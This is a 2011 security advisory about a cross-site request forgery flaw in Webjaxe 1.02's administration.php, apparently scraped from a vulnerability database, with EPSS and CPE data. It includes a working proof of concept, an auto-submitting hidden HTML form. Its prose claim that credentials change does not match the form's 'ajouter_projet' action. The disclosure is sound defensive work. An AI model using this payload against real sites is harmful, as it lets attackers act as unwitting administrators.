Lucene search

K
htbridgeHigh-Tech BridgeHTB22927
HistoryMar 29, 2011 - 12:00 a.m.

Cross-site Request Forgery (CSRF) in Webjaxe

2011-03-2900:00:00
High-Tech Bridge
www.htbridge.com
27

0.005 Low

EPSS

Percentile

76.7%

High-Tech Bridge SA Security Research Lab has discovered vulnerability in Webjaxe which could be exploited to perform cross-site request forgery attacks.

  1. Cross-site request forgery (CSRF) in Webjaxe
    The vulnerability exists due to insufficient validation of the request origin in php/partie_administrateur/administration.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and modify administrator`s credentials.
    Exploitation example:
    <form action=“http://[host]/php/partie_administrateur/administration.php” method=“post” name=“main” id=“main”>
    <input type=“hidden” name=“action” value=“ajouter_projet”>
    <input type=“hidden” name=“titre_projet” value=“123123”>
    <input type=“hidden” name=“ajouter” value=“Add”>
    <input type=“hidden” name=“submit” value=“OK”>
    <input type=“submit” id=“btn”>
    </form>
    <script>
    document.getElementById(‘btn’).click();
    </script>
CPENameOperatorVersion
webjaxele1.02

0.005 Low

EPSS

Percentile

76.7%

Related for HTB22927